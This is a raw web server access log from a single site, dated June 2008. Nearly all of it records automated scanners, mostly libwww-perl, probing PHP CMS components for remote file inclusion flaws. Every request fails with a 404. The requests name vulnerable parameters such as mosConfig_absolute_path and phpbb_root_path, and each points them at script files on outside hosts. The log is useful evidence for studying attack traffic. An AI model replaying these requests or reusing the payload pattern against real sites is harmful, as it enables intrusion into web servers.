153.19.101.68 - - [24/Jun/2008:10:31:39 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:10:31:39 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.200.255.217 - - [24/Jun/2008:10:32:12 -0700] "GET /errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.200.255.217 - - [24/Jun/2008:10:32:12 -0700] "GET /logs/errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.200.255.217 - - [24/Jun/2008:10:32:12 -0700] "GET /logs/access.log/errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
203.57.68.22 - - [24/Jun/2008:10:32:56 -0700] "GET /logs//main.php?sayfa=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.57.68.22 - - [24/Jun/2008:10:32:56 -0700] "GET //main.php?sayfa=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.75.39 - - [24/Jun/2008:10:33:08 -0700] "GET /logs/home.php?inc=ftp://24.227.40.218/temp/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.75.39 - - [24/Jun/2008:10:33:08 -0700] "GET /logs/home.php?inc=ftp://24.227.40.218/temp/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.75.39 - - [24/Jun/2008:10:33:08 -0700] "GET /home.php?inc=ftp://24.227.40.218/temp/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.75.39 - - [24/Jun/2008:10:33:08 -0700] "GET /home.php?inc=ftp://24.227.40.218/temp/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.108.91.166 - - [24/Jun/2008:10:33:21 -0700] "GET /logs/access_080127.log//modules/TotalCalendar/about.php?inc_dir=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.79.162.194 - - [24/Jun/2008:10:33:23 -0700] "GET /logs/access_080118.log/classes/core/language.php?rootdir=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.79.162.194 - - [24/Jun/2008:10:33:23 -0700] "GET /classes/core/language.php?rootdir=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.79.162.194 - - [24/Jun/2008:10:33:23 -0700] "GET /logs/classes/core/language.php?rootdir=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.205.74.80 - - [24/Jun/2008:10:33:45 -0700] "GET /logs//main.php?sayfa=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.205.74.80 - - [24/Jun/2008:10:33:45 -0700] "GET //main.php?sayfa=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
82.80.245.220 - - [24/Jun/2008:10:33:50 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://nakash.file-il.com/rotest.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
82.80.245.220 - - [24/Jun/2008:10:33:51 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://nakash.file-il.com/rotest.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
216.195.42.191 - - [24/Jun/2008:10:33:58 -0700] "GET /logs/access_080118.log/classes/core/language.php?rootdir=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.195.42.191 - - [24/Jun/2008:10:33:58 -0700] "GET /classes/core/language.php?rootdir=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.195.42.191 - - [24/Jun/2008:10:33:58 -0700] "GET /logs/classes/core/language.php?rootdir=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.195.42.191 - - [24/Jun/2008:10:34:06 -0700] "GET /logs/access_080215.log//includes/functions_portal.php?phpbb_root_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.195.42.191 - - [24/Jun/2008:10:34:06 -0700] "GET //includes/functions_portal.php?phpbb_root_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.195.42.191 - - [24/Jun/2008:10:34:06 -0700] "GET /logs//includes/functions_portal.php?phpbb_root_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:10:35:02 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:10:35:03 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.89.31.213 - - [24/Jun/2008:10:35:08 -0700] "GET /logs//includes/functions_portal.php?phpbb_root_path=http://www.dichotomy.com.au/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.213 - - [24/Jun/2008:10:35:08 -0700] "GET //includes/functions_portal.php?phpbb_root_path=http://www.dichotomy.com.au/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
81.92.215.103 - - [24/Jun/2008:10:35:25 -0700] "GET /logs/access_080117.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.92.215.103 - - [24/Jun/2008:10:35:25 -0700] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.92.215.103 - - [24/Jun/2008:10:35:26 -0700] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.9.129.201 - - [24/Jun/2008:10:35:34 -0700] "GET //components/com_calendar.php?absolute_path=http://www.friendsofnarconon.org/modules/is/Osryid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.84 - - [24/Jun/2008:10:35:34 -0700] "GET /logs//includes/functions_portal.php?phpbb_root_path=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.9.129.201 - - [24/Jun/2008:10:35:34 -0700] "GET //components/com_calendar.php?absolute_path=http://www.friendsofnarconon.org/modules/is/Osryid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.84 - - [24/Jun/2008:10:35:34 -0700] "GET //includes/functions_portal.php?phpbb_root_path=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.200.255.217 - - [24/Jun/2008:10:36:04 -0700] "GET /errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.200.255.217 - - [24/Jun/2008:10:36:04 -0700] "GET /logs/errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.200.255.217 - - [24/Jun/2008:10:36:04 -0700] "GET /logs/access_080215.log/errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.53.25.34 - - [24/Jun/2008:10:36:04 -0700] "GET /logs/access_080118.log//inc/cmses/aedating4CMS.php?dir[inc]=http://thepornhandbook.com/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.25.34 - - [24/Jun/2008:10:36:04 -0700] "GET /logs//inc/cmses/aedating4CMS.php?dir[inc]=http://thepornhandbook.com/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.200.255.217 - - [24/Jun/2008:10:36:06 -0700] "GET /errors.php?error=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.20.46.121 - - [24/Jun/2008:10:37:16 -0700] "GET /logs/access_080301.log/facileforms.frame.php?ff_compath=http://www.lynnlott.com/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.20.46.121 - - [24/Jun/2008:10:37:16 -0700] "GET /facileforms.frame.php?ff_compath=http://www.lynnlott.com/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.20.46.121 - - [24/Jun/2008:10:37:16 -0700] "GET /logs/facileforms.frame.php?ff_compath=http://www.lynnlott.com/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.20.46.121 - - [24/Jun/2008:10:37:50 -0700] "GET /logs/access_080229.log/facileforms.frame.php?ff_compath=http://www.lynnlott.com/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.15.205.17 - - [24/Jun/2008:10:37:59 -0700] "GET /logs/access.log/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://loverzpoint.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.205.17 - - [24/Jun/2008:10:38:00 -0700] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://loverzpoint.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.205.17 - - [24/Jun/2008:10:38:00 -0700] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://loverzpoint.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.79.162.194 - - [24/Jun/2008:10:38:08 -0700] "GET /logs/access_080215.log//includes/functions_portal.php?phpbb_root_path=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.79.162.194 - - [24/Jun/2008:10:38:08 -0700] "GET //includes/functions_portal.php?phpbb_root_path=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.79.162.194 - - [24/Jun/2008:10:38:08 -0700] "GET /logs//includes/functions_portal.php?phpbb_root_path=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.82.114.151 - - [24/Jun/2008:10:38:24 -0700] "GET /errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:10:38:31 -0700] "GET //modules/xfsection/modify.php?dir_module=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:10:38:31 -0700] "GET //modules/xfsection/modify.php?dir_module=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.92.215.103 - - [24/Jun/2008:10:39:19 -0700] "GET /logs/access_080215.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.15.205.17 - - [24/Jun/2008:10:39:38 -0700] "GET /logs/access_080329.log/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://loverzpoint.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.205.17 - - [24/Jun/2008:10:39:38 -0700] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://loverzpoint.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.205.17 - - [24/Jun/2008:10:39:38 -0700] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://loverzpoint.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.111.176.84 - - [24/Jun/2008:10:39:46 -0700] "GET /logs/access_080215.log//includes/functions_portal.php?phpbb_root_path=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.139.226 - - [24/Jun/2008:10:41:56 -0700] "GET /logs//includes/functions_portal.php?phpbb_root_path=http://www.dichotomy.com.au/tmp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [24/Jun/2008:10:41:56 -0700] "GET //includes/functions_portal.php?phpbb_root_path=http://www.dichotomy.com.au/tmp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.55.211.28 - - [24/Jun/2008:10:42:05 -0700] "GET /presto/?M=A HTTP/1.1" 200 526 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
64.22.89.194 - - [24/Jun/2008:10:42:25 -0700] "GET /logs/access_080301.log//encapscms_PATH/core/core.php?root=http://www.gfca.aero//cache/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [24/Jun/2008:10:42:25 -0700] "GET //encapscms_PATH/core/core.php?root=http://www.gfca.aero//cache/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [24/Jun/2008:10:42:26 -0700] "GET /logs//encapscms_PATH/core/core.php?root=http://www.gfca.aero//cache/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.53.197.2 - - [24/Jun/2008:10:42:26 -0700] "GET /logs/access_080301.log//encapscms_PATH/core/core.php?root=http://h1.ripway.com/gang11/scan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [24/Jun/2008:10:42:26 -0700] "GET //encapscms_PATH/core/core.php?root=http://h1.ripway.com/gang11/scan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [24/Jun/2008:10:42:26 -0700] "GET /logs//encapscms_PATH/core/core.php?root=http://h1.ripway.com/gang11/scan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [24/Jun/2008:10:42:38 -0700] "GET /logs/access_080223.log//encapscms_PATH/core/core.php?root=http://h1.ripway.com/gang11/scan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.22.89.194 - - [24/Jun/2008:10:42:48 -0700] "GET /logs/access_080223.log//encapscms_PATH/core/core.php?root=http://www.gfca.aero//cache/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.213 - - [24/Jun/2008:10:43:08 -0700] "GET /logs/access_080123.log//includes/functions_portal.php?phpbb_root_path=http://www.dichotomy.com.au/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.55.137.141 - - [24/Jun/2008:10:43:36 -0700] "GET /logs/access_080131.log/skins/advanced/advanced1.php?pluginpath[0]=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.137.141 - - [24/Jun/2008:10:43:36 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.137.141 - - [24/Jun/2008:10:43:36 -0700] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.137.141 - - [24/Jun/2008:10:43:37 -0700] "GET /logs/access_080212.log/skins/advanced/advanced1.php?pluginpath[0]=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.221.143.111 - - [24/Jun/2008:10:44:09 -0700] "GET /logs/access_071228.log/upgrade_album.php?GALLERY_BASEDIR=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [24/Jun/2008:10:44:09 -0700] "GET /logs/access_071229.log/upgrade_album.php?GALLERY_BASEDIR=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.165.49.171 - - [24/Jun/2008:10:44:49 -0700] "GET /logs//jscript.php?my_ms[root]=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.165.49.171 - - [24/Jun/2008:10:44:50 -0700] "GET //jscript.php?my_ms[root]=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.57.1.181 - - [24/Jun/2008:10:45:28 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.52.139.226 - - [24/Jun/2008:10:46:19 -0700] "GET /logs/access_080118.log/classes/core/language.php?rootdir=http://www.dichotomy.com.au/tmp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [24/Jun/2008:10:46:19 -0700] "GET /classes/core/language.php?rootdir=http://www.dichotomy.com.au/tmp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [24/Jun/2008:10:46:19 -0700] "GET /logs/classes/core/language.php?rootdir=http://www.dichotomy.com.au/tmp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.172.232.90 - - [24/Jun/2008:10:46:38 -0700] "GET /logs/access_071219.log//includes/messages.inc.php?include_path=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.172.232.90 - - [24/Jun/2008:10:46:38 -0700] "GET //includes/messages.inc.php?include_path=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.172.232.90 - - [24/Jun/2008:10:46:39 -0700] "GET /logs//includes/messages.inc.php?include_path=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
218.239.223.69 - - [24/Jun/2008:10:46:41 -0700] "GET /logs/access_080215.log//includes/functions_portal.php?phpbb_root_path=http://www.dichotomy.com.au/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.239.223.69 - - [24/Jun/2008:10:46:42 -0700] "GET //includes/functions_portal.php?phpbb_root_path=http://www.dichotomy.com.au/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.239.223.69 - - [24/Jun/2008:10:46:42 -0700] "GET /logs//includes/functions_portal.php?phpbb_root_path=http://www.dichotomy.com.au/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.92.215.103 - - [24/Jun/2008:10:46:49 -0700] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.92.215.103 - - [24/Jun/2008:10:46:50 -0700] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:10:47:21 -0700] "GET /logs/access_071216.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:10:47:22 -0700] "GET /logs/access_071216.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:10:47:22 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:10:47:22 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:10:47:33 -0700] "GET /logs/access_071212.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:10:47:33 -0700] "GET /logs/access_071212.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.52.139.226 - - [24/Jun/2008:10:47:37 -0700] "GET /logs/access_080215.log//includes/functions_portal.php?phpbb_root_path=http://www.dichotomy.com.au/tmp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.62.24.242 - - [24/Jun/2008:10:48:08 -0700] "GET /logs/access.log/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.24.242 - - [24/Jun/2008:10:48:09 -0700] "GET /administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.24.242 - - [24/Jun/2008:10:48:09 -0700] "GET /logs/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.203.122.236 - - [24/Jun/2008:10:48:15 -0700] "GET /logs/access_080312.log//oneadmin/config.php?path[docroot]=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.203.122.236 - - [24/Jun/2008:10:48:16 -0700] "GET //oneadmin/config.php?path[docroot]=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.203.122.236 - - [24/Jun/2008:10:48:17 -0700] "GET /logs//oneadmin/config.php?path[docroot]=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.137.141 - - [24/Jun/2008:10:48:19 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.137.141 - - [24/Jun/2008:10:48:19 -0700] "GET //skin/zero_vote/error.php?dir=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.137.141 - - [24/Jun/2008:10:48:19 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:10:49:13 -0700] "GET /logs/access_080215.log//components/com_cpg/cpg.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:10:49:14 -0700] "GET /logs/access_080215.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:10:49:14 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:10:49:15 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.9.60.141 - - [24/Jun/2008:10:50:11 -0700] "GET /logs//includes/functions_portal.php?phpbb_root_path=http://www.dichotomy.com.au/tmp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.9.60.141 - - [24/Jun/2008:10:50:11 -0700] "GET //includes/functions_portal.php?phpbb_root_path=http://www.dichotomy.com.au/tmp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.246.68.52 - - [24/Jun/2008:10:50:22 -0700] "GET /administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
202.57.1.181 - - [24/Jun/2008:10:50:27 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.57.1.181 - - [24/Jun/2008:10:50:28 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.246.68.52 - - [24/Jun/2008:10:50:34 -0700] "GET /logs/access.log/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
